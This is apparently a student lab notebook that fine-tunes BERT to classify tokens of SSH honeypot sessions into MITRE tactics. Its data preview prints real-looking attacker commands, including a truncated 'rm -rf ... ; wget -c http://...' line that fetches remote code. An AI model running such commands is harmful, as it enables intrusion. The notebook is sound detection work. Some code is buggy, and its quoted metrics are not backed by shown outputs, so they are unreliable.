<a href="https://colab.research.google.com/github/AI4-Cybersec/Laboratory4/blob/main/lab/notebooks/Task3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Task 3

## Setup

In [1]:
# --- Check Python and pip versions ---
!python --version
!pip install --upgrade pip

Python 3.12.12
Collecting pip
  Downloading pip-25.3-py3-none-any.whl.metadata (4.7 kB)
Downloading pip-25.3-py3-none-any.whl (1.8 MB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m1.8/1.8 MB[0m [31m69.3 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: pip
  Attempting uninstall: pip
    Found existing installation: pip 24.1.2
    Uninstalling pip-24.1.2:
      Successfully uninstalled pip-24.1.2
Successfully installed pip-25.3


In [2]:
# --- Install required libraries ---
!pip install torch
!pip install numpy pandas scikit-learn matplotlib seaborn
!pip install tqdm



In [3]:
# --- Import libraries ---
import os
import time
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import json

from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, LabelEncoder
from sklearn.utils.class_weight import compute_class_weight
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score, f1_score
from sklearn.decomposition import PCA
from sklearn.impute import SimpleImputer

import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader, TensorDataset

from tqdm import tqdm

### Colab Pro

In [4]:
# --- Check GPU availability ---
gpu_info = !nvidia-smi
gpu_info = '\n'.join(gpu_info)
if gpu_info.find('failed') >= 0:
  print('Not connected to a GPU')
else:
  print(gpu_info)

Thu Dec 18 09:56:04 2025       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.54.15              Driver Version: 550.54.15      CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|   0  Tesla T4                       Off |   00000000:00:04.0 Off |                    0 |
| N/A   44C    P8             12W /   70W |       0MiB /  15360MiB |      0%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                

In [5]:
# --- Check RAM availability ---
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))

if ram_gb < 20:
  print('Not using a high-RAM runtime')
else:
  print('You are using a high-RAM runtime!')

Your runtime has 13.6 gigabytes of available RAM

Not using a high-RAM runtime


### Paths setup


In [6]:
# --- Mount Google Drive (for Google Colab users) ---
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [7]:
# --- Define Paths ---
laboratory = 'Laboratory4'

base_path = '/content/drive/MyDrive/'
project_path = base_path + f'Projects/{laboratory}/'
data_path = project_path + 'data/'
results_path = project_path + 'results/'

# Ensure directories exist
os.makedirs(project_path, exist_ok=True)
os.makedirs(data_path, exist_ok=True)
os.makedirs(results_path, exist_ok=True)

print(f"Project path: {project_path}")
print(f"Data path: {data_path}")
print(f"Results path: {results_path}")

Project path: /content/drive/MyDrive/Projects/Laboratory4/
Data path: /content/drive/MyDrive/Projects/Laboratory4/data/
Results path: /content/drive/MyDrive/Projects/Laboratory4/results/


In [8]:
import os

from transformers import AutoTokenizer
import numpy as np
import pandas as pd

import matplotlib.pyplot as plt
import seaborn as sns

from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score
from itertools import chain
from copy import deepcopy

from transformers import AutoModelForTokenClassification, AutoConfig, get_scheduler
from transformers import DataCollatorForTokenClassification

from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from datasets import Dataset, DatasetDict
from torch import cuda

from tqdm.auto import tqdm
import torch

from torch.utils.data import DataLoader
from torch.optim import AdamW

In [9]:
device = 'cuda' if cuda.is_available() else 'cpu'
device

'cuda'

## Start

In [None]:
# ============================================================================
# GLOBAL CONFIGURATION: Plot Saving (Colab/Google Drive only)
# ============================================================================
SAVE_PLOTS = 1
# ============================================================================

import os
import matplotlib.pyplot as plt

BASE_DIR = results_path + 'Task3'
os.makedirs(BASE_DIR, exist_ok=True)

def save_figure_for_report(filename, dpi=300, bbox_inches='tight'):
    """
    Save the current matplotlib figure for use in the report.

    Args:
        filename: Name of the file (e.g., 'class_distribution.png')
        dpi: Resolution (default 300 for high quality)
        bbox_inches: Bounding box setting (default 'tight' to remove whitespace)
    """
    if not SAVE_PLOTS:
        return  # Skip saving if flag is disabled or filename missing

    filepath = os.path.join(BASE_DIR, filename)
    plt.savefig(filepath, dpi=dpi, bbox_inches=bbox_inches)
    print(f"Figure saved to: {filepath}")


### Helper Functions

In [11]:
def compute_metrics(full_predictions, full_labels):
    """
    Calculate both token-level and sentence-level metrics for token classification.
    Args:
        full_predictions: List of lists of predicted labels
        full_labels: List of lists of true labels
    Returns:
        dict: Dictionary containing calculated metrics
    """
    # Token-level metrics
    # Flatten predictions and labels > create a single, long list
    flat_predictions = list(chain(*full_predictions))
    flat_labels = list(chain(*full_labels))
    # Calculate standard classification metrics
    token_accuracy = accuracy_score(flat_labels, flat_predictions)
    token_precision = precision_score(flat_labels, flat_predictions, average='macro', zero_division=0)
    token_recall = recall_score(flat_labels, flat_predictions, average='macro', zero_division=0)
    token_f1 = f1_score(flat_labels, flat_predictions, average='macro', zero_division=0)
    # Return all metrics in a dictionary
    metrics = {
        "token_accuracy": token_accuracy,
        "token_precision": token_precision,
        "token_recall": token_recall,
        "token_f1": token_f1,
    }
    return metrics

In [None]:
def plot_stats(title, training_losses, validation_losses=None, best_epoch=None):
    """
    Improved plotting function styled for professional reports.
    Matches the aesthetic of the provided training_loop (larger fonts, cleaner lines).
    """
    # Set the theme to match the example
    sns.set_theme(style="whitegrid")
    
    plt.figure(figsize=(10, 5))

    # Ensure x-axis represents Epochs starting from 1
    epochs = range(1, len(training_losses) + 1)

    # Plot Training Loss (Style: Line width 2, no markers for cleaner look, consistent colors)
    plt.plot(epochs, training_losses, label='Training Loss', linewidth=2, color='#1f77b4')

    if validation_losses is not None:
        # Plot Validation Loss
        plt.plot(epochs, validation_losses, label='Validation Loss', linewidth=2, linestyle='--', color='#d62728')

        # Highlight the best epoch (the one with the lowest validation loss)
        if best_epoch is not None:
            # Shift best_epoch by 1 to match 1-based indexing of epochs
            actual_best_epoch = best_epoch + 1
            
            # Vertical line for best epoch
            plt.axvline(x=actual_best_epoch, color='gray', linestyle=':', linewidth=2, label='Best Epoch')
            
            # Add a point to highlight the minimum
            y_val = validation_losses[best_epoch]
            plt.scatter(actual_best_epoch, y_val, color='black', s=50, zorder=5)

            # Annotation styled to match the larger fonts
            plt.annotate('Best Model',
                         xy=(actual_best_epoch, y_val),
                         xytext=(actual_best_epoch, y_val + (max(training_losses) - min(training_losses))*0.1),
                         arrowprops=dict(facecolor='black', shrink=0.05, width=1, headwidth=8),
                         fontsize=14, fontweight='bold')

    # Add Titles and Labels with increased font sizes
    plt.title(title, fontsize=18, fontweight='bold', pad=15)
    plt.xlabel('Epoch', fontsize=17)
    plt.ylabel('Cross-Entropy Loss', fontsize=17)

    # Adjust tick parameters for better readability
    plt.tick_params(axis='both', which='major', labelsize=15)

    # Refine the Legend and Grid
    # Using 'loc=best' and larger font size
    plt.legend(fontsize=16, frameon=True, shadow=True)
    plt.grid(True, linestyle='-', alpha=0.5)

    # Ensure integer ticks for epochs if the range is small enough
    if len(epochs) < 20:
        plt.xticks(epochs)

    plt.tight_layout()
    
    # --- SAVE THE PLOT ---
    # Create a clean filename from the title
    clean_title = title.lower().replace(" ", "_").replace("(", "").replace(")", "")
    save_figure_for_report(f"learning_curve_{clean_title}.png")
    
    plt.show()

In [13]:
def training_loop(model, optimizer, lr_scheduler):
    best_val_loss, best_epoch = np.inf, 0
    best_model = deepcopy(model).to(device)

    progress_bar = tqdm(range(num_training_steps))
    val_losses, train_losses = [], [] # Lists to keep track of the training and validation losses

    for epoch in range(N_TRAIN_EPOCHS):
        # Training
        model.train()
        train_loss = 0
        for batch in train_dataloader:
            batch = {key:value.to(device) for key, value in batch.items()}
            # Model expects:
            # - input_ids > i.e., which tokens we must map into the embeddings
            # - attention_mask > who shall each token pays attention to
            # - labels > the NER tags
            outputs = model(input_ids=batch["input_ids"],
                            attention_mask=batch["attention_mask"],
                            labels=batch["labels"]
            )
            # Notice: the model already comes with a CrossEntropy loss
            # - if `labels` are defined, a loss is also computed
            loss = outputs.loss
            train_loss += loss.detach().cpu().clone().numpy()
            loss.backward()
            optimizer.step()
            lr_scheduler.step()
            optimizer.zero_grad()
            progress_bar.update(1)
        train_losses.append(train_loss/len(train_dataloader))
        # Evaluation
        model.eval()
        full_predictions, full_labels = [], []
        val_loss = 0
        for batch in eval_dataloader:
            batch = {key:value.to(device) for key, value in batch.items()}
            with torch.no_grad():
                outputs = model(**batch)
            val_loss += outputs.loss.detach().cpu().clone().numpy()
            # Extract the predictions
            predictions = outputs.logits.argmax(dim=-1)
            labels = batch["labels"]
            true_predictions, true_labels = postprocess(predictions, labels)
            full_predictions+=true_predictions
            full_labels+=true_labels
        val_loss = val_loss/len(eval_dataloader)
        val_losses.append(val_loss)
        metrics = compute_metrics(full_predictions, full_labels)
        print(
            f"epoch {epoch}:",
            {
                key: metrics[key]
                for key in ["token_accuracy", "token_f1"]
            },
        )
        if val_loss <= best_val_loss:
            best_epoch = epoch
            best_val_loss = val_loss
            best_model = deepcopy(model).to(device)

    return best_model, best_epoch, best_val_loss, train_losses, val_losses

In [14]:
# Evaluation
def evaluate_model(model, best_model):
  model.eval()
  full_predictions, full_labels = [], []
  for batch in test_dataloader:
      batch = {key:value.to(device) for key, value in batch.items()}
      with torch.no_grad():
          # Another way to pass the items to the model
          outputs = best_model(**batch)
      # Extract the predictions
      predictions = outputs.logits.argmax(dim=-1)
      labels = batch["labels"]
      true_predictions, true_labels = postprocess(predictions, labels)
      full_predictions+=true_predictions
      full_labels+=true_labels
  test_metrics = compute_metrics(full_predictions, full_labels)

  return full_predictions, full_labels, test_metrics

In [None]:
def print_classification_report(true_labels, true_predictions, model_name):
    """
    Enhanced reporting function.
    Calculates Token-level metrics, Per-class F1 with support, and Session Fidelity.
    """
    # 1. Flattening for token-level metrics
    flat_preds = list(chain(*true_predictions))
    flat_labels = list(chain(*true_labels))

    # Calculate Metrics
    token_accuracy = accuracy_score(flat_labels, flat_preds)
    token_precision = precision_score(flat_labels, flat_preds, average='macro', zero_division=0)
    token_recall = recall_score(flat_labels, flat_preds, average='macro', zero_division=0)
    token_f1 = f1_score(flat_labels, flat_preds, average='macro', zero_division=0)

    # 2. Session Fidelity Calculation (Requirement 4)
    # Reusing the logic from your session_fidelity function
    fidelity_scores = []
    for labels, preds in zip(true_labels, true_predictions):
        correct = sum(1 for l, p in zip(labels, preds) if l == p)
        fidelity_scores.append(correct / len(labels))
    avg_fidelity = np.mean(fidelity_scores)

    # Print Text Summary
    print(f"\n" + "="*50)
    print(f" PERFORMANCE REPORT: {model_name}")
    print("="*50)
    print(f"{'Token Accuracy:':<25} {token_accuracy:.4f}")
    print(f"{'Macro Precision:':<25} {token_precision:.4f}")
    print(f"{'Macro Recall:':<25} {token_recall:.4f}")
    print(f"{'Macro F1-score:':<25} {token_f1:.4f}")
    print(f"{'Avg Session Fidelity:':<25} {avg_fidelity:.4f}")
    print("-" * 50)

    # 3. Prepare Data for Plotting (Requirement 3)
    class_names = [id2label[i] for i in sorted(id2label.keys())]
    report_dict = classification_report(
        flat_labels, flat_preds,
        labels=class_names,
        target_names=class_names,
        output_dict=True,
        zero_division=0
    )

    # Create labels that include the support (count)
    labels_with_support = [f"{cls}\n(n={int(report_dict[cls]['support'])})" for cls in class_names]
    f1_values = [report_dict[cls]['f1-score'] for cls in class_names]

    # Create Plot
    plt.figure(figsize=(12, 6), dpi=100)
    sns.set_theme(style="whitegrid")

    # Use a color gradient based on the F1 value (darker = better performance)
    colors = sns.color_palette("Blues_d", len(f1_values))
    rank = np.argsort(f1_values)
    palette = [colors[i] for i in np.argsort(rank)]

    barplot = sns.barplot(x=labels_with_support, y=f1_values, palette=palette, edgecolor=".2")

    # Add values on top of bars
    for i, p in enumerate(barplot.patches):
        barplot.annotate(format(p.get_height(), '.3f'),
                       (p.get_x() + p.get_width() / 2., p.get_height()),
                       ha = 'center', va = 'center',
                       xytext = (0, 9),
                       textcoords = 'offset points',
                       fontsize=10, fontweight='bold')

    plt.title(f"Per-Class F1-Score: {model_name}", fontsize=16, fontweight='bold', pad=20)
    plt.ylabel("F1-Score", fontsize=12)
    plt.xlabel("Tactics (and Support Count)", fontsize=12)
    plt.ylim(0, 1.1) # Leave space for the labels
    plt.xticks(rotation=0) # Labels are cleaner with \n support

    sns.despine(left=True)
    plt.tight_layout()

    # --- SAVE THE PLOT ---
    clean_name = model_name.lower().replace(" ", "_").replace("(", "").replace(")", "")
    save_figure_for_report(f"per_class_f1_{clean_name}.png")

    plt.show()

In [None]:
def postprocess(predictions, labels):
    """
    Post-processes model predictions and ground-truth labels for evaluation.

    This function detaches predictions and labels from any computation graph,
    moves them to CPU, clones, and converts them to NumPy arrays. It then
    maps token IDs to their corresponding label names, ignoring special
    tokens indicated by the index `-100`.

    Args:
        predictions (torch.Tensor): Model output predictions (logits or token IDs).
        labels (torch.Tensor): Ground-truth labels corresponding to the inputs.

    Returns:
        Tuple[List[List[str]], List[List[str]]]:
            A tuple containing two lists:
            - `true_predictions`: The list of predicted label sequences, aligned with the true labels.
            - `true_labels`: The list of true label sequences with special tokens removed.
    """
    predictions = predictions.detach().cpu().clone().numpy()
    labels = labels.detach().cpu().clone().numpy()
    # Remove ignored index (special tokens) and convert to labels
    true_labels = [[id2label[l] for l in label if l != -100] for label in labels]
    true_predictions = [
        [id2label[p] for (p, l) in zip(prediction, label) if l != -100]
        for prediction, label in zip(predictions, labels)
    ]
    return true_predictions, true_labels

### Start

In [16]:
train_df = pd.read_json(f"{data_path}/train.json")
test_df = pd.read_json(f"{data_path}/test.json")
print(f"The dataset contains {train_df.shape[0]:,} elements")
train_df.head(2)

The dataset contains 251 elements


Unnamed: 0,session,label
0,rm -rf /var/run/1sh ; wget -c http://71.127.14...,"[Execution, Execution, Execution, Execution, E..."
1,cat /proc/cpuinfo | grep name | wc -l ; echo r...,"[Discovery, Discovery, Discovery, Discovery, D..."


Fine-tune a BERT model for Named Entity Recognition. Load the pre-trained model with
pre-trained weights from Huggingface. Focus on a token-classification task: The model
will try to classify each token into one of the MITRE Tactics. Compute the following
metrics:
1. Token classification accuracy.
2. Macro token classification precision, recall, and f1-score.
3. Per-class f1-score: reports the results in a barplot.
4. Average session ‘fidelity’: for each session, the model predicts some tokens correctly.

For each session, the ‘fidelity’ score is calculated as a fraction between the num-
ber of correct predictions and the total number of tokens (e.g. for the session ‘cat
cpu/procinfo;’ with the tags [‘Discovery’, ‘Discovery’, ‘Discovery’] and the predic-
tion [‘Discovery’, ‘Discovery’, ‘Execution’], the fidelity is 32 = 0.67).
Calculate the average fidelity for all test sessions.

Q: Can the model achieve "good" results with only 251 training labeled samples? Where
does it have the most difficulties?

In [17]:
train_df, val_df = train_test_split(train_df, test_size=0.2, random_state=42)
print(f"New training dataset contains {train_df.shape[0]:,} elements")
print(f"Validation dataset contains {val_df.shape[0]:,} elements")

New training dataset contains 200 elements
Validation dataset contains 51 elements


In [18]:
# Convert the training DATAFRAME into an huggingface DATASET
train_ds = Dataset.from_pandas(train_df.reset_index(drop=True))
train_ds

Dataset({
    features: ['session', 'label'],
    num_rows: 200
})

In [19]:
full_ds = DatasetDict(
    {
        "train": Dataset.from_pandas(train_df.reset_index(drop=True)),
        "valid": Dataset.from_pandas(val_df.reset_index(drop=True)),
        "test": Dataset.from_pandas(test_df.reset_index(drop=True)),
    }
)
full_ds

DatasetDict({
    train: Dataset({
        features: ['session', 'label'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['session', 'label'],
        num_rows: 51
    })
    test: Dataset({
        features: ['session', 'label'],
        num_rows: 108
    })
})

In [20]:
# 1. Extract the labels
unique_labels = list(train_df.label.explode().unique())
print(unique_labels)

['Execution', 'Discovery', 'Not Malicious Yet', 'Persistence', 'Other', 'Defense Evasion', 'Impact']


In [21]:
# 2. Obtain a dictionary that maps the labels into identifiers (Labels Encoder)
id2label = {it:label for it, label in enumerate(unique_labels)}
label2id = {label:it for it, label in enumerate(unique_labels)}
print(label2id)

{'Execution': 0, 'Discovery': 1, 'Not Malicious Yet': 2, 'Persistence': 3, 'Other': 4, 'Defense Evasion': 5, 'Impact': 6}


In [22]:
def convert_labels_to_ids(sample):
    sample['label_id'] = [label2id[el] for el in sample["label"]]
    return sample
# Apply the mapping function to all splits of your dataset
encoded_dataset = full_ds.map(convert_labels_to_ids)
encoded_dataset

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

DatasetDict({
    train: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 51
    })
    test: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 108
    })
})

In [23]:
print("Example:")
EXAMPLE_ID = 3
print(f'Original label: {encoded_dataset["train"][EXAMPLE_ID]["label"]}')
print(f'Converted label: {encoded_dataset["train"][EXAMPLE_ID]["label_id"]}')

Example:
Original label: ['Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery'

In [24]:
model = "google-bert/bert-base-uncased"
tokenizer = AutoTokenizer.from_pretrained(model)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


tokenizer_config.json:   0%|          | 0.00/48.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/570 [00:00<?, ?B/s]

vocab.txt: 0.00B [00:00, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]

Create a function that aligns the labels with the tokens

In [25]:
def align_labels_with_tokens(labels, word_ids):
    """Aligns token-level labels with word-level labels for tokenized text.

    This function maps word-level labels to their corresponding tokens after tokenization.
    It handles special tokens (with None word_ids) and subword tokens (multiple tokens for one word).
    Args:
       labels (list): Original word-level labels.
       word_ids (list): List of word indices that each token corresponds to.
                        None values represent special tokens.
    Returns:
       list: New token-aligned labels where:
            - Special tokens (None word_ids) are assigned -100
            - First token of each word gets the word's label
            - Continuation tokens of the same word also get the word's label
    Example:
       labels = [0, 1, 2]  # Labels for 3 words
       word_ids = [None, 0, 0, 1, 2, 2, None]  # Tokenized into 7 tokens
       result = [-100, 0, 0, 1, 2, 2, -100]  # Aligned labels
    """
    new_labels = []
    current_word = None
    for word_id in word_ids:
        if word_id != current_word:
            # Start of a new word or special token
            current_word = word_id
            # Use -100 for special tokens, otherwise use the original label
            label = -100 if word_id is None else labels[word_id]
            new_labels.append(label)
        elif word_id is None:
            # Special token (like [CLS], [SEP], etc.)
            new_labels.append(-100)
        else:
            # Continuation token of the current word
            # We assign the same label as the word
            label = labels[word_id]
            new_labels.append(label)
    return new_labels

Now create a function that, for each sample:
1) Tokenize the input
2) Align the tokens with the corresponding tags

In [26]:
def tokenize_and_align_labels(samples):
    """Tokenizes text examples and aligns their labels with the resulting tokens.
    This function processes a batch of examples by:
    1. Tokenizing the text in 'sentences' field
    2. Converting word-level labels to token-level labels for each example
    3. Adding the aligned labels back to the tokenized inputs
    Args:
       examples (dict): Dictionary containing:
           - 'sentences': List of text sentences
           - 'tags_id': List of lists containing word-level tags for each command
    Returns:
       dict: Tokenized inputs with aligned labels:
           - Standard tokenizer outputs (input_ids, attention_mask, etc.)
           - 'labels': Token-level labels aligned with the tokenized inputs
    Notes:
       - Uses a pre-defined tokenizer (must be available in scope)
       - Sets is_split_into_words=True because input is already word-tokenized
       - Uses align_labels_with_tokens helper function to handle subword tokenization
    """
    # Remember: we need to split the sentences
    split_sentences = [sentence.split(" ") for sentence in samples["session"]]
    # Tokenize all examples in batch using the global tokenizer
    tokenized_inputs = tokenizer(
        split_sentences,
        truncation=True,  # Truncate to max length if needed
        is_split_into_words=True  # Input is already split into words
    )
    # Extract all tags_id lists from the examples
    all_tags = samples["label_id"]
    new_labels = []
    # Process each example's labels individually
    for i, tags in enumerate(all_tags):
        # Get word ID mapping for the current example
        word_ids = tokenized_inputs.word_ids(i)
        # Convert word-level tags to token-level tags
        aligned_labels = align_labels_with_tokens(tags, word_ids)
        new_labels.append(aligned_labels)
    # Add the aligned labels to the tokenized inputs
    tokenized_inputs["labels"] = new_labels
    return tokenized_inputs

Eventually, use the `map` function provided by the huggingface Dataset

Notice: it already works on ALL the partitions (`train`, `validation` and `test`)

In [27]:
original_columns = encoded_dataset["train"].column_names
tokenized_datasets = encoded_dataset.map(
    tokenize_and_align_labels,
    batched=True, # Can be performed in batches, in order to speed up times!
    remove_columns=original_columns, # To remove the original columns
)
tokenized_datasets

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

DatasetDict({
    train: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 51
    })
    test: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 108
    })
})

In [28]:
data_collator = DataCollatorForTokenClassification(tokenizer=tokenizer)

In [29]:
train_dataloader = DataLoader(
    tokenized_datasets["train"],
    shuffle=True,
    collate_fn=data_collator,
    batch_size=16,
)
eval_dataloader = DataLoader(
    tokenized_datasets["valid"], collate_fn=data_collator, batch_size=16
)
test_dataloader = DataLoader(
    tokenized_datasets["test"], collate_fn=data_collator, batch_size=16
)

## Fine-Tuning a pre-trained BERT model

In [30]:
pretrained_model = "google-bert/bert-base-uncased"

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for BERT Fine-Tuned
# =============================

sns.set_theme(style="whitegrid")
N_TRAIN_EPOCHS = 40

# Define learning rates to try
bert_lrs = [5e-6, 1e-5, 5e-5]
bert_lr_labels = [f"LR={lr}" for lr in bert_lrs]

# Store losses and results for each LR
bert_train_losses = {}
bert_val_losses = {}
bert_results = {}

for lr, lr_label in zip(bert_lrs, bert_lr_labels):

    # Re-initialize model and optimizer for each LR
    model = AutoModelForTokenClassification.from_pretrained(
        pretrained_model_name_or_path=pretrained_model,
        id2label=id2label,
        label2id=label2id,
    ).to(device)

    optimizer = AdamW(model.parameters(), lr=lr)

    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)

    lr_scheduler = get_scheduler(
        "linear",
        optimizer=optimizer,
        num_warmup_steps=0,
        num_training_steps=num_training_steps,
    )

    # Train
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model, optimizer, lr_scheduler)
    bert_train_losses[lr_label] = train_losses
    bert_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"BERT Fine-tuned {lr_label}")
    plot_stats(f"BERT Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # Evaluate
    full_predictions, full_labels, test_metrics = evaluate_model(model, best_model)

    # Compute train/val metrics at best epoch
    train_acc = test_metrics["token_accuracy"]

    val_acc = None  # Optionally, compute on val set if needed

    test_acc = test_metrics["token_accuracy"]

    bert_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:
# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

# Training Loss
ax1 = axes[0]
for i, (lr_label, losses) in enumerate(bert_train_losses.items()):
    ax1.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax1.set_title("BERT Fine-Tuned — Training Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax1.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax1.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax1.tick_params(labelsize=TICK_FONTSIZE)
ax1.grid(alpha=0.3)
ax1.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

# Validation Loss
ax2 = axes[1]
for i, (lr_label, losses) in enumerate(bert_val_losses.items()):
    ax2.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
ax2.set_title("BERT Fine-Tuned — Validation Loss", fontsize=TITLE_FONTSIZE, fontweight='bold')
ax2.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
ax2.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
ax2.tick_params(labelsize=TICK_FONTSIZE)
ax2.grid(alpha=0.3)
ax2.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_bert_lr_comparison_report.png")
plt.show()

# Summary Table
print("\n" + "="*90)
print("SUMMARY: Learning Rate Comparison for BERT Fine-Tuned")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")  
print("-"*90)
for lr_label in bert_lr_labels:
    train_acc = bert_results[lr_label]['train'][2]
    val_acc   = bert_results[lr_label]['val'][2]
    test_acc  = bert_results[lr_label]['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print("="*90)

# Repeat similar blocks for other models (BERT Naked, UniXcoder, UniXcoder Frozen/Head Only) as needed.

Remember: the model is going to classify all tokens > we need a function to post-process and gather the predictions!

Define metrics and a function named `compute_metrics`

Q: Can the model achieve "good" results with only 251 training labeled samples?

Answer: 
Yes, the model achieves surprisingly high token accuracy (~84%) despite the extremely small training set. This is because BERT leverages Transfer Learning: it was pre-trained on a massive corpus (Wikipedia/Books) and already understands general linguistic structures (command-like patterns, paths, and flags).

However, the Macro F1-score (~0.52) reveals that the model struggles significantly with Class Imbalance.
- Discovery and Execution tactics are well-represented and perform well.

Q: Where does it have the most difficulties?

Answer: The model has the most difficulty with rare classes (like Impact or Persistence) where the "support" (number of samples) is very low. With only 251 samples total, some tactics appear only a handful of times, making it impossible for the model to generalize those specific intentions effectively.

Assume that this is a ‘simple problem’ (i.e., any model, refined with the same samples, could achieve the same scores). Therefore, create a baseline where instead of pre-trained BERT (with its pre-trained weights), you load only the BERT architecture. Train this ‘naked’ BERT in an end-to-end manner.

Q: Can you achieve the same performance with the "naked" BERT?

Answer: No, the "Naked" BERT (trained from scratch with random weights) performs significantly worse across all metrics.
- BERT Fine-tuned: Macro F1 ~0.52, Token Accuracy ~84%.
- BERT Naked: Macro F1 ~0.42, Token Accuracy ~73%.

This experiment demonstrates the importance of Pre-training. Without the weights inherited from a large-scale corpus, the BERT architecture acts as an empty shell. It cannot learn the complex syntax of SSH malicious sessions and the semantic nuances of MITRE tactics from just 251 samples. This confirms that Transfer Learning is mandatory for small-scale cybersecurity datasets.

## Fine-Tuning a Naked Bert Model

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for BERT Naked
# =============================

naked_lrs = [5e-6, 1e-5, 5e-5]
naked_lr_labels = [f"LR={lr}" for lr in naked_lrs]
naked_train_losses = {}
naked_val_losses = {}
naked_results = {}

for lr, lr_label in zip(naked_lrs, naked_lr_labels):
    config = AutoConfig.from_pretrained(
        "google-bert/bert-base-uncased",
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    )
    naked_model = AutoModelForTokenClassification.from_config(config).to(device)
    optimizer = AdamW(naked_model.parameters(), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler = get_scheduler(
        "linear",
        optimizer=optimizer,
        num_warmup_steps=0,
        num_training_steps=num_training_steps,
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(naked_model, optimizer, lr_scheduler)
    naked_train_losses[lr_label] = train_losses
    naked_val_losses[lr_label] = val_losses

    print_classification_report(full_labels, full_predictions, model_name=f"Naked-BERT Fine-tuned {lr_label}")
    plot_stats(f"Naked-BERT Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

